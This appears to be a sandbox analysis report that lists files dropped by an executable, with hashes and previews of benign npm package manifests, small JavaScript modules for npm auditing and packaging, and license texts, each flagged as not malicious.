              SHA-256:6A3152681C0EE1CAE3A33D276601DEF9FF36A06FB42166EB937357CB27C66B8F
              SHA-512:A18805C101A62E1AA675F92E930AB1FF07E9FB2096446C16538044D7886941ED0C0389282BDDB238D12DFC7C941D4B4CC16778723E62ECB62F6EBD1A741240F4
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "normalize-package-data",. "version": "6.0.0",. "author": "GitHub Inc.",. "description": "Normalizes data that can be found in package.json files.",. "license": "BSD-2-Clause",. "repository": {. "type": "git",. "url": "https://github.com/npm/normalize-package-data.git". },. "main": "lib/normalize.js",. "scripts": {. "test": "tap",. "npmclilint": "npmcli-lint",. "lint": "eslint \"**/*.js\"",. "lintfix": "npm run lint -- --fix",. "posttest": "npm run lint",. "postsnap": "npm run lintfix --",. "postlint": "template-oss-check",. "snap": "tap",. "template-oss-apply": "template-oss-apply --force". },. "dependencies": {. "hosted-git-info": "^7.0.0",. "is-core-module": "^2.8.1",. "semver": "^7.3.5",. "validate-npm-package-license": "^3.0.4". },. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.18.0",. "tap": "^16.0.1". },. "files": [. "bin/",. "lib/". ],. "engines": {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):575
              Entropy (8bit):4.507733324786177
              Encrypted:false
              SSDEEP:
              MD5:3A037DC07380D5EE8E85CE38A090A8AE
              SHA1:C133F00A8954F4B513371D8DD481B86A57EF3AC1
              SHA-256:8433D9B8D2383A8C95F6EAF347B1DEFCE44F29C0806A74575B35ADF14BD5ADE5
              SHA-512:AE20B758794F7E7A25562FD30C99876F6CDAADC2FE9ACC66A11E2A6A94E0160AEC1C5BE8A76521F59DCD92157C4F475DD72938A958D52629F3B04BEA7D2D0297
              Malicious:false
              Reputation:unknown
              Preview:module.exports = (chalk) => {. const green = s => chalk.green.bold(s). const red = s => chalk.red.bold(s). const magenta = s => chalk.magenta.bold(s). const yellow = s => chalk.yellow.bold(s). const white = s => chalk.bold(s). const severity = (sev, s) => sev.toLowerCase() === 'moderate' ? yellow(s || sev). : sev.toLowerCase() === 'high' ? red(s || sev). : sev.toLowerCase() === 'critical' ? magenta(s || sev). : white(s || sev). const dim = s => chalk.dim(s).. return {. dim,. green,. red,. magenta,. yellow,. white,. severity,. }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):419
              Entropy (8bit):4.618878995196262
              Encrypted:false
              SSDEEP:
              MD5:1F1EEE21298E1867420F2248BF6D5486
              SHA1:EA31FC20771088F1708C977BE637D5BF10474FFF
              SHA-256:DEFAB80CCC58437A93AB1CFEBE2CF776232AC22B9F0C7BFFB33EBE3013E2A4D9
              SHA-512:E8922DAA1DFF36F62E765A4C43B37DB9C897BCC248A4931278D298D460C7767465A1461E52967D3F2173583916C45FC2577FDCCE51BE3F316A1925AD3B441B76
              Malicious:false
              Reputation:unknown
              Preview:// return 1 if any vulns in the set are at or above the specified severity.const severities = new Map(Object.entries([. 'info',. 'low',. 'moderate',. 'high',. 'critical',. 'none',.]).map(s => s.reverse()))..module.exports = (data, level) =>. Object.entries(data.metadata.vulnerabilities). .some(([sev, count]) => count > 0 && severities.has(sev) &&. severities.get(sev) >= severities.get(level)) ? 1 : 0.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):911
              Entropy (8bit):4.761988770877871
              Encrypted:false
              SSDEEP:
              MD5:F945973B74106B9150CD4169458609DF
              SHA1:0125201A9A74D602804EBFF2613EC26452E2E574
              SHA-256:90693D7F3A0E0E2930F7CAC3332698785E9062008098383E14260C3DE451F94C
              SHA-512:A070B5E3CB43DC9BEF92CD9F334845CFF40C10EA9E9D2A2F6E0FECC25242FD58E481634AD6B965417B0AB7D3BFFB22F6966E0700664FC7199C5053FBDB14C4C8
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const reporters = {. install: require('./reporters/install'),. detail: require('./reporters/detail'),. json: require('./reporters/json'),. quiet: require('./reporters/quiet'),.}..const exitCode = require('./exit-code.js')..module.exports = Object.assign((data, options = {}) => {. const {. reporter = 'install',. chalk,. unicode = true,. indent = 2,. } = options.. // CLI defaults this to `null` so the defaulting method above doesn't work. const auditLevel = options.auditLevel || 'low'.. if (!data) {. throw Object.assign(. new TypeError('ENOAUDITDATA'),. {. code: 'ENOAUDITDATA',. message: 'missing audit data',. }. ). }.. if (typeof data.toJSON === 'function') {. data = data.toJSON(). }.. return {. report: reporters[reporter](data, { chalk, unicode, indent }),. exitCode: exitCode(data, auditLevel),. }.}, { reporters }).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2405
              Entropy (8bit):4.713715066115983
              Encrypted:false
              SSDEEP:
              MD5:1D7F94197C55E7523EB5537313BA9F14
              SHA1:43156FDD3AC8ADCB9C939C1D3B95A370158BBAF8
              SHA-256:362252940707C9669E5105CD1D921710457A94E649C019FB92843135B181C7E2
              SHA-512:CB4FA1521BAE52F0806A6E63D6AEAFDF0A1CAE473466834F8F5C1DA1DF5658B9635BFEB8638A6A20806BDC95102C1D06500D4B34A8843460BBADC9DF23764AC7
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const colors = require('../colors.js').const install = require('./install.js')..module.exports = (data, { chalk }) => {. const summary = install.summary(data, { chalk }). const none = data.metadata.vulnerabilities.total === 0. return none ? summary : fullReport(data, { chalk, summary }).}..const fullReport = (data, { chalk, summary }) => {. const c = colors(chalk). const output = [c.white('# npm audit report'), ''].. const printed = new Set(). for (const [, vuln] of Object.entries(data.vulnerabilities)) {. // only print starting from the top-level advisories. if (vuln.via.filter(v => typeof v !== 'string').length !== 0) {. output.push(printVuln(vuln, c, data.vulnerabilities, printed)). }. }.. output.push(summary).. return output.join('\n').}..const printVuln = (vuln, c, vulnerabilities, printed, indent = '') => {. if (printed.has(vuln)) {. return null. }.. printed.add(vuln). const output = [].. output.push(c.white(vuln.name) + ' ' + vuln.r
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2431
              Entropy (8bit):4.718635151085769
              Encrypted:false
              SSDEEP:
              MD5:6F5B29FFCAD209E907C37E2C3C991F68
              SHA1:F45FEDAD6157EE18DC2EDF501D778AEBDF574312
              SHA-256:8950FD273351E94E33D424D9FD709905D738F31FA042D52EC9AEF729BDA143E9
              SHA-512:4DC8ABE138D315295EBEC4F9C73C15A2D48B0E44496F20FAF1B18763A168F88CA306C0DCAABE9934E21C73C237583835FF693643F5FE7D4B04D0CBD5B4003101
              Malicious:false
              Reputation:unknown
              Preview:const colors = require('../colors.js')..const calculate = (data, { chalk }) => {. const c = colors(chalk). const output = []. const { metadata: { vulnerabilities } } = data. const vulnCount = vulnerabilities.total.. let someFixable = false. let someForceFixable = false. let forceFixSemVerMajor = false. let someUnfixable = false.. if (vulnCount === 0) {. output.push(`found ${c.green('0')} vulnerabilities`). } else {. for (const [, vuln] of Object.entries(data.vulnerabilities)) {. const { fixAvailable } = vuln. someFixable = someFixable || fixAvailable === true. someUnfixable = someUnfixable || fixAvailable === false. if (typeof fixAvailable === 'object') {. someForceFixable = true. forceFixSemVerMajor = forceFixSemVerMajor || fixAvailable.isSemVerMajor. }. }. const total = vulnerabilities.total. const sevs = Object.entries(vulnerabilities).filter(([s, count]) => {. return (s === 'low' || s === 'moderate' || s === 'high
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):74
              Entropy (8bit):4.578800791299243
              Encrypted:false
              SSDEEP:
              MD5:5DDA2647D6572F0B749830786ED44ACC
              SHA1:EFC0E919AB55F978321019720F1DA22EB4271EAC
              SHA-256:F7F450434517C15D0A3581FCE3EE3F40C3F9645F64CA39F421B8556DA4AE0D16
              SHA-512:743FC38902A75416B57A579AE305FF22EC8A7BF4928BAB1C5B87D03A843BE18C1D60BFC6D10A1709BDCDCE0D5DF2213C5DFCAC2DFED4D43DC51A143D3B1E09E8
              Malicious:false
              Reputation:unknown
              Preview:module.exports = (data, { indent }) => JSON.stringify(data, null, indent).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):26
              Entropy (8bit):4.085055102756477
              Encrypted:false
              SSDEEP:
              MD5:621EC4EA22414B1386B5F21267225A49
              SHA1:6046163A4A8C6E17F84A9D3BC9A49BEACF713B81
              SHA-256:2A932A8B0FE058E2804805ED1745B2C2281D4FDD4A2D7681F7C27712782DA00F
              SHA-512:FDF9C449E9F61DBA483D85F0A9C3F2DDC5F53832AC3E2CBD7F1C7EF56A90512B9DF88CF7B27374D176D95BA2A1A89AE8226E51A50D58ABEBF41768F361BAE9A7
              Malicious:false
              Reputation:unknown
              Preview:module.exports = () => ''.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1430
              Entropy (8bit):4.685056155265087
              Encrypted:false
              SSDEEP:
              MD5:44E3266E4DB17131A2AF5CFF2CE60BC8
              SHA1:65B68833B01E83B5E3A22621BD4BA0C362FAEF02
              SHA-256:29E6EC954244810F83658385A89E54329DDFD6BE9EB099C4EBAAE57D952E1EDE
              SHA-512:A5F6C6071B25C7F4954584425F5E6AB85F5D2B11E291B7090C7413B31FF641944EBDD677A5CE365C7546524D78CB569F2B76CC3E15C32177A4F041B254EF440D
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "npm-audit-report",. "version": "5.0.0",. "description": "Given a response from the npm security api, render it into a variety of security reports",. "main": "lib/index.js",. "scripts": {. "test": "tap",. "snap": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "npm run lint -- --fix",. "posttest": "npm run lint". },. "tap": {. "check-coverage": true,. "coverage-map": "map.js",. "nyc-arg": [. "--exclude",. "tap-snapshots/**". ]. },. "keywords": [. "npm",. "security",. "report",. "audit". ],. "author": "GitHub Inc.",. "license": "ISC",. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.14.1",. "chalk": "^5.2.0",. "tap": "^16.0.0". },. "directories": {. "lib": "lib",. "test": "test". },. "repository": {. "type": "git",. "url": "https://github.com/npm/npm-audit-
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6506
              Entropy (8bit):4.619375863847205
              Encrypted:false
              SSDEEP:
              MD5:548137573A47828FCD0559D6E7F4A3D6
              SHA1:0CC61F00D12350B36A0868D8E7F5A44ADD62DD1F
              SHA-256:F135D5F1C21CAA59C5D0A6B0E59E18D5099002AF537CA7A263E64BA02A2A976D
              SHA-512:4F248A97019994BB7E155B2BA4732A02E437F14075149697B0F986BE6C5D985FF9E4D42368E796CCD7390A63C2E7B154811F7B01DEB39666652FC6C6D2F7A021
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..// walk the tree of deps starting from the top level list of bundled deps.// Any deps at the top level that are depended on by a bundled dep that.// does not have that dep in its own node_modules folder are considered.// bundled deps as well. This list of names can be passed to npm-packlist.// as the "bundled" argument. Additionally, packageJsonCache is shared so.// packlist doesn't have to re-read files already consumed in this pass..const fs = require('fs').const path = require('path').const EE = require('events').EventEmitter.// we don't care about the package bins, but we share a pj cache.// with other modules that DO care about it, so keep it nice..const normalizePackageBin = require('npm-normalize-package-bin')..class BundleWalker extends EE {. constructor (opt) {. opt = opt || {}. super(opt). this.path = path.resolve(opt.path || process.cwd()).. this.parent = opt.parent || null. if (this.parent) {. this.result = this.parent.result. // on
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1207
              Entropy (8bit):4.725867351353186
              Encrypted:false
              SSDEEP:
              MD5:F2280082414371875EFF8B1163502D9D
              SHA1:DD4332E1FBC24EB44596410BC37AEDC27F51A39E
              SHA-256:53B4F469C2A459CCCAC60CBF50B5A3EF9EFDEAA022DC4FA08D349DC26BE83926
              SHA-512:1D1DF17F8D78F539A4F2C1C3C8F611925EE24E0C8F9E473019F21D5C906BF334077AC1B369EA25FE9C6094D1A4799E3F7BF2548EB8658BDA5B8678024CA73B1D
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "npm-bundled",. "version": "3.0.0",. "description": "list things in node_modules that are bundledDependencies, or transitive dependencies thereof",. "main": "lib/index.js",. "repository": {. "type": "git",. "url": "https://github.com/npm/npm-bundled.git". },. "author": "GitHub Inc.",. "license": "ISC",. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.5.1",. "mkdirp": "^1.0.4",. "mutate-fs": "^2.1.1",. "rimraf": "^3.0.2",. "tap": "^16.3.0". },. "scripts": {. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "npm run lint -- --fix",. "snap": "tap",. "posttest": "npm run lint". },. "files": [. "bin/",. "lib/". ],. "dependencies": {. "npm-normalize-package-bin": "^3.0.0". },. "engines": {. "node": "^14.17.0 || ^16.13.0 || >=18.0.0". },. "templateOSS": {. "//@npmcli/templ
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1333
              Entropy (8bit):5.136341255305027
              Encrypted:false
              SSDEEP:
              MD5:A509D5E6A5B1B1583CE07F713FE0D628
              SHA1:CE72654DEA747A8C04D1882A2015F63EF54813B5
              SHA-256:F674630C4D3E668DABAC6D955FB5F74C75B4A63A707AC93A8833B74BDC57221E
              SHA-512:00E755A08DC1AC1F652308F3444FBEE2EEA60C89F7A081F1FECC6CFA6F9C30367D1144B4407A96E334E8A29C2D462DA32ED31949027A946D7928C4C155B8951E
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) Robert Kowalski and Isaac Z. Schlueter ("Authors").All rights reserved...The BSD License..Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions.are met:..1. Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE AUTHORS AND CONTRIBUTORS ``AS IS'' AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE.IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR.PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS.BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR.CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PR
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2705
              Entropy (8bit):4.663359781229
              Encrypted:false
              SSDEEP:
              MD5:5E894EBAEED97FB21560871975FB6BC3
              SHA1:017A9F76B2D7A0FA65E22E03550329C4F5C339F2
              SHA-256:F293ADB7D15F20015BB3D47D156387A2CDF6D22BB173E2B211EA03D8CB1295F6
              SHA-512:6921AB3196E82118FF24AB28151229B66AFC175CDA133A15A02F9321FE134DB69B141F9FAAFF978EBC0ECE9602DAFF54EA7918D3B81EB83AB8EEC376E6A7041B
              Malicious:false
              Reputation:unknown
              Preview:const semver = require('semver')..const checkEngine = (target, npmVer, nodeVer, force = false) => {. const nodev = force ? null : nodeVer. const eng = target.engines. const opt = { includePrerelease: true }. if (!eng) {. return. }.. const nodeFail = nodev && eng.node && !semver.satisfies(nodev, eng.node, opt). const npmFail = npmVer && eng.npm && !semver.satisfies(npmVer, eng.npm, opt). if (nodeFail || npmFail) {. throw Object.assign(new Error('Unsupported engine'), {. pkgid: target._id,. current: { node: nodeVer, npm: npmVer },. required: eng,. code: 'EBADENGINE',. }). }.}..const isMusl = (file) => file.includes('libc.musl-') || file.includes('ld-musl-')..const checkPlatform = (target, force = false, environment = {}) => {. if (force) {. return. }.. const platform = environment.os || process.platform. const arch = environment.cpu || process.arch. const osOk = target.os ? checkList(platform, target.os) : true. const cpuOk = target.cpu ? ch
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1169
              Entropy (8bit):4.706465084833645
              Encrypted:false
              SSDEEP:
              MD5:909C7290E7CC93E312804FD5CF0B694A
              SHA1:CC69F6252A94500D261597E780B70F72C9EDE810
              SHA-256:2A6EE2635151A1ADB941ACC65ABBC4C1B20B97D9B5E3247797188CB0F9B4B4D8
              SHA-512:1EF3D54295ABD3611FB969A3F1873A80499D66F4FE89B26671F19F9456647F8715CA99207CE153929033A9EDCFD478D71FB193589368BC23F7B5119068FEA737
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "npm-install-checks",. "version": "6.3.0",. "description": "Check the engines and platform fields in package.json",. "main": "lib/index.js",. "dependencies": {. "semver": "^7.1.1". },. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.19.0",. "tap": "^16.0.1". },. "scripts": {. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "npm run lint -- --fix",. "snap": "tap",. "posttest": "npm run lint". },. "repository": {. "type": "git",. "url": "https://github.com/npm/npm-install-checks.git". },. "keywords": [. "npm,",. "install". ],. "license": "BSD-2-Clause",. "files": [. "bin/",. "lib/". ],. "engines": {. "node": "^14.17.0 || ^16.13.0 || >=18.0.0". },. "author": "GitHub Inc.",. "templateOSS": {. "//@npmcli/template-oss": "This file is partially managed by @npmcli/template-
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1346
              Entropy (8bit):4.784577152544583
              Encrypted:false
              SSDEEP:
              MD5:63206DA08E529BCDD83F2BF0F191A42D
              SHA1:75ECAF8CDC6F2AFEF112C9782E74E53DC59D6130
              SHA-256:5D5FB5CAE6D9C04079C01E6E1978DE69D19C77FF160F523DF462D08BCA44B2DD
              SHA-512:806581F88E4B4E43235B1F4FE67B337E7497CBBADB97B5EF64E505AFE0CDC4B1243EF6098DB61DB8C8228E2CE7CEC681E6E32B0547DE7F7ADB6626364E36AAEB
              Malicious:false
              Reputation:unknown
              Preview:// pass in a manifest with a 'bin' field here, and it'll turn it.// into a properly santized bin object.const { join, basename } = require('path')..const normalize = pkg =>. !pkg.bin ? removeBin(pkg). : typeof pkg.bin === 'string' ? normalizeString(pkg). : Array.isArray(pkg.bin) ? normalizeArray(pkg). : typeof pkg.bin === 'object' ? normalizeObject(pkg). : removeBin(pkg)..const normalizeString = pkg => {. if (!pkg.name) {. return removeBin(pkg). }. pkg.bin = { [pkg.name]: pkg.bin }. return normalizeObject(pkg).}..const normalizeArray = pkg => {. pkg.bin = pkg.bin.reduce((acc, k) => {. acc[basename(k)] = k. return acc. }, {}). return normalizeObject(pkg).}..const removeBin = pkg => {. delete pkg.bin. return pkg.}..const normalizeObject = pkg => {. const orig = pkg.bin. const clean = {}. let hasBins = false. Object.keys(orig).forEach(binKey => {. const base = join('/', basename(binKey.replace(/\\|:/g, '/'))).slice(1).. if (typeof orig[binKey] !== 'string'
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1096
              Entropy (8bit):4.7347446077591115
              Encrypted:false
              SSDEEP:
              MD5:18F886552A03D49ED0D3F6615D8F4254
              SHA1:6A20E531EF2B5054446AF15FF4E4AC2B812F3A43
              SHA-256:859842BC95C994E539EFBB0EC249BF11576ADF03F69E6E83EA446EAB98997F1C
              SHA-512:76DE342D033E215B6B3D33356E70987B987F0FB8E5532BF9D519B2AA53245C27F71D2179DF2BDA9F560B93D9F82AD063792820A4D696CEC58A587349BC3DC44A
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "npm-normalize-package-bin",. "version": "3.0.1",. "description": "Turn any flavor of allowable package.json bin into a normalized object",. "main": "lib/index.js",. "repository": {. "type": "git",. "url": "https://github.com/npm/npm-normalize-package-bin.git". },. "author": "GitHub Inc.",. "license": "ISC",. "scripts": {. "test": "tap",. "snap": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "npm run lint -- --fix",. "posttest": "npm run lint". },. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.14.1",. "tap": "^16.3.0". },. "files": [. "bin/",. "lib/". ],. "engines": {. "node": "^14.17.0 || ^16.13.0 || >=18.0.0". },. "templateOSS": {. "//@npmcli/template-oss": "This file is partially managed by @npmcli/template-oss. Edits may be overwritten.",. "version": "4.14.1",. "publish":
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):12477
              Entropy (8bit):4.93878344741827
              Encrypted:false
              SSDEEP:
              MD5:420A7321493B44F3A2FE341C03D15543
              SHA1:0B9CD18A5280531ADF3265B0E935AD51421B1C59
              SHA-256:42997FF50034C4CAB8390F941EB2C92E5037E12A4EA816C55570F6A9E0D954AC
              SHA-512:26B12644EBD48E283596E61C374634D2A2F7FD4B429141868E6A120808CA54DAE1E64F228E836A382889C0FBBC4F61A72C705CBA3E85D4C29AB9E60D2A409C27
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.module.exports = npa.module.exports.resolve = resolve.module.exports.toPurl = toPurl.module.exports.Result = Result..const { URL } = require('url').const HostedGit = require('hosted-git-info').const semver = require('semver').const path = global.FAKE_WINDOWS ? require('path').win32 : require('path').const validatePackageName = require('validate-npm-package-name').const { homedir } = require('os').const log = require('proc-log')..const isWindows = process.platform === 'win32' || global.FAKE_WINDOWS.const hasSlashes = isWindows ? /\\|[/]/ : /[/]/.const isURL = /^(?:git[+])?[a-z]+:/i.const isGit = /^[^@]+@[^:.]+\.[^:]+:.+$/i.const isFilename = /[.](?:tgz|tar.gz|tar)$/i..function npa (arg, where) {. let name. let spec. if (typeof arg === 'object') {. if (arg instanceof Result && (!where || where === arg.where)) {. return arg. } else if (arg.name && arg.rawSpec) {. return npa.resolve(arg.name, arg.rawSpec, where || arg.where). } else {. return npa(arg
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1576
              Entropy (8bit):4.685246987452486
              Encrypted:false
              SSDEEP:
              MD5:7F372F304928CE6E96CC9B265BD724E5
              SHA1:B29A7A0DEEA4C0CDD60D6A3922BBAE6B1CDE76FE
              SHA-256:DCD1C389504D6B98CA54556443A65CE6697FD304F0FFA85AFD1AB0C5F8EFE0CB
              SHA-512:9A5ED311FCCD4367F793C3262C4E3B65DC939CDC287EDAE7F6CD1EE5DE92E5CA8984649329D554C4DA22A70B063DCBCCB0324E5BA08F438F194B55B4CED8F65C
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "npm-package-arg",. "version": "11.0.1",. "description": "Parse the things that can be arguments to `npm install`",. "main": "./lib/npa.js",. "directories": {. "test": "test". },. "files": [. "bin/",. "lib/". ],. "dependencies": {. "hosted-git-info": "^7.0.0",. "proc-log": "^3.0.0",. "semver": "^7.3.5",. "validate-npm-package-name": "^5.0.0". },. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.18.0",. "tap": "^16.0.1". },. "scripts": {. "test": "tap",. "snap": "tap",. "npmclilint": "npmcli-lint",. "lint": "eslint \"**/*.js\"",. "lintfix": "npm run lint -- --fix",. "posttest": "npm run lint",. "postsnap": "npm run lintfix --",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force". },. "repository": {. "type": "git",. "url": "https://github.com/npm/npm-package-arg.git". },. "author": "GitHub Inc.",. "license": "ISC",. "bugs": {
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):16729
              Entropy (8bit):4.59418523077253
              Encrypted:false
              SSDEEP:
              MD5:E3A6D5C325404ECC7B6A1F29B2BF9D1B
              SHA1:29984DF2F8172C412C63056D5FE0CF5AAD54BA9C
              SHA-256:4A4C28A8C2AC40FA93E08CFE40330AFF9617D55E1F6E341927E520FF8E4B6DB9
              SHA-512:8227696C57BB6C4BB229B249A08BBD56884F96A4CE3411D35550BA2AE4ED6039172648FA3646892F3573488EAEA0451663F544D62B010AD3E147426632EBE081
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { Walker: IgnoreWalker } = require('ignore-walk').const { lstatSync: lstat, readFileSync: readFile } = require('fs').const { basename, dirname, extname, join, relative, resolve, sep } = require('path')..// symbols used to represent synthetic rule sets.const defaultRules = Symbol('npm-packlist.rules.default').const strictRules = Symbol('npm-packlist.rules.strict')..// There may be others, but :?|<> are handled by node-tar.const nameIsBadForWindows = file => /\*/.test(file)..// these are the default rules that are applied to everything except for non-link bundled deps.const defaults = [. '.npmignore',. '.gitignore',. '**/.git',. '**/.svn',. '**/.hg',. '**/CVS',. '**/.git/**',. '**/.svn/**',. '**/.hg/**',. '**/CVS/**',. '/.lock-wscript',. '/.wafpickle-*',. '/build/config.gypi',. 'npm-debug.log',. '**/.npmrc',. '.*.swp',. '.DS_Store',. '**/.DS_Store/**',. '._*',. '**/._*/**',. '*.orig',. '/archived-packages/**',.]..const strictDefaults = [. // the
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1413
              Entropy (8bit):4.657213162608309
              Encrypted:false
              SSDEEP:
              MD5:43F05A736945D8B16EF4CA371A28E71D
              SHA1:E5B0864D89FF8C7F947F767A5AEE6E5491BC35FF
              SHA-256:A27D78CFA8BDB1364ABF5CF655FF28C554CFE79F6199B397D925EFB6FE861A4B
              SHA-512:9ECA1FB752833CE3AE8E6D93C416E00BBE75DDE7FF09E37773CF8AA9460C79607468A71BC416EA4A213F6622A561106D3280445CF47C59A2D395D83292647A21
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "npm-packlist",. "version": "8.0.0",. "description": "Get a list of the files to add from a folder into an npm package",. "directories": {. "test": "test". },. "main": "lib/index.js",. "dependencies": {. "ignore-walk": "^6.0.0". },. "author": "GitHub Inc.",. "license": "ISC",. "files": [. "bin/",. "lib/". ],. "devDependencies": {. "@npmcli/arborist": "^6.0.0 || ^6.0.0-pre.0",. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.18.0",. "mutate-fs": "^2.1.1",. "tap": "^16.0.1". },. "scripts": {. "test": "tap",. "posttest": "npm run lint",. "snap": "tap",. "postsnap": "npm run lintfix --",. "eslint": "eslint",. "lint": "eslint \"**/*.js\"",. "lintfix": "npm run lint -- --fix",. "npmclilint": "npmcli-lint",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force". },. "repository": {. "type": "git",. "url": "https://github.com/npm/npm-packlist.git". },. "ta
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):755
              Entropy (8bit):4.986133556658205
              Encrypted:false
              SSDEEP:
              MD5:5324D196A847002A5D476185A59CF238
              SHA1:DFE418DC288EDB0A4BB66AF2AD88BD838C55E136
              SHA-256:720836C9BDAD386485A492AB41FE08007ECF85CA278DDD8F9333494DCAC4949D
              SHA-512:1B4187C58BEBB6378F8A04300DA6F4D1F12F6FBE9A1AB7CEDA8A4752E263F282DAEBCAC1379FA0675DD78EC86FFFB127DBA6469F303570B9F21860454DF2203F
              Malicious:false
              Reputation:unknown
              Preview:ISC License..Copyright (c) npm, Inc...Permission to use, copy, modify, and/or distribute this software for.any purpose with or without fee is hereby granted, provided that the.above copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE COPYRIGHT HOLDER DISCLAIMS.ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE.COPYRIGHT HOLDER BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR.CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS.OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE.OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE.USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6848
              Entropy (8bit):4.720893115887277
              Encrypted:false
              SSDEEP:
              MD5:414E14C56B1523722F209B7509376EA1
              SHA1:D0EC5FB87D8D8B04A7D6EF944C767689E5E229D3
              SHA-256:E7A7FD5377C26E40D292E0C931B2AAF1061B1151A3A2E5AEBA073B97D3006003
              SHA-512:EBB82FB7DE288AC20F4FF27A9D3FB94C26FFF19BB6D04724C527909AC998A80B1C5A71A7D368EBC972E185782C7CAA61D3239E0BD0C6BE4ACB518CBA699CC73F
              Malicious:false
              Reputation:unknown
